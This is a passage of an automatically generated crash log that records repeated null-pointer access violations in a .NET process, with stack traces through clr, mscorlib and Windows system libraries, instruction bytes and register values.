0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 78 04 b9 50 b3 9f 71 e8 3e 1b 47 f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a0589
registers.esp: 104721644
registers.edi: 47387824
registers.eax: 0
registers.ebp: 104721756
registers.edx: 118119717
registers.ebx: 46570232
registers.esi: 47357964
registers.ecx: 5915148
1 0 0

__exception__

stacktrace:
0x70a0583
0x6864f21
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 3b 42 04 7f 73 b9 b0 91 0e 01 ba 6d 00 00 00 e8
exception.instruction: cmp eax, dword ptr [edx + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a4b3f
registers.esp: 104721520
registers.edi: 47427768
registers.eax: 0
registers.ebp: 104721636
registers.edx: 0
registers.ebx: 46570232
registers.esi: 104721520
registers.ecx: 46553620
1 0 0

__exception__

stacktrace:
0x6864f21
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 78 04 b9 50 b3 9f 71 e8 3e 1b 47 f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a0589
registers.esp: 104721644
registers.edi: 47427768
registers.eax: 0
registers.ebp: 104721756
registers.edx: 118115996
registers.ebx: 46570232
registers.esi: 47417932
registers.ecx: 5915148
1 0 0

__exception__

stacktrace:
0x6864f84
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 78 04 b9 50 b3 9f 71 e8 e5 c0 46 f9 8d 56 0c
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a5fe2
registers.esp: 104721640
registers.edi: 47590792
registers.eax: 0
registers.ebp: 104721756
registers.edx: 118119717
registers.ebx: 44998324
registers.esi: 47579160
registers.ecx: 5915148
1 0 0

__exception__

stacktrace:
0x68651d8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 78 04 b9 50 b3 9f 71 e8 94 b2 46 f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a6e33
registers.esp: 104721640
registers.edi: 48606328
registers.eax: 0
registers.ebp: 104721752
registers.edx: 118119717
registers.ebx: 44998324
registers.esi: 47941164
registers.ecx: 5915148
1 0 0

__exception__

stacktrace:
0x70a6e2d
0x68651d8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 3b 42 04 7f 73 b9 b0 91 0e 01 ba 6d 00 00 00 e8
exception.instruction: cmp eax, dword ptr [edx + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a4b3f
registers.esp: 104721516
registers.edi: 49292000
registers.eax: 0
registers.ebp: 104721632
registers.edx: 0
registers.ebx: 44998324
registers.esi: 104721516
registers.ecx: 48656980
1 0 0

__exception__

stacktrace:
0x68651d8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 78 04 b9 50 b3 9f 71 e8 94 b2 46 f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a6e33
registers.esp: 104721640
registers.edi: 49292000
registers.eax: 0
registers.ebp: 104721752
registers.edx: 118115996
registers.ebx: 44998324
registers.esi: 48668780
registers.ecx: 5915148
1 0 0

__exception__

stacktrace:
0x6865544
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 78 04 b9 50 b3 9f 71 e8 cc 9f 46 f9 8d 56 0c
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a80fb
registers.esp: 104721640
registers.edi: 50448544
registers.eax: 0
registers.ebp: 104721752
registers.edx: 118119717
registers.ebx: 44998324
registers.esi: 49742512
registers.ecx: 5915148
1 0 0

__exception__

stacktrace:
0x70a80f5
0x6865544
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 3b 42 04 7f 73 b9 b0 91 0e 01 ba 6d 00 00 00 e8
exception.instruction: cmp eax, dword ptr [edx + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a4b3f
registers.esp: 104721516
registers.edi: 47016964
registers.eax: 0
registers.ebp: 104721632
registers.edx: 0
registers.ebx: 44998324
registers.esi: 104721516
registers.ecx: 50552660
1 0 0

__exception__

stacktrace:
0x6865544
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 78 04 b9 50 b3 9f 71 e8 cc 9f 46 f9 8d 56 0c
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a80fb
registers.esp: 104721640
registers.edi: 47016964
registers.eax: 0
registers.ebp: 104721752
registers.edx: 118115996
registers.ebx: 44998324
registers.esi: 50556680
registers.ecx: 5915148
1 0 0

__exception__

stacktrace:
0x68655f4
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
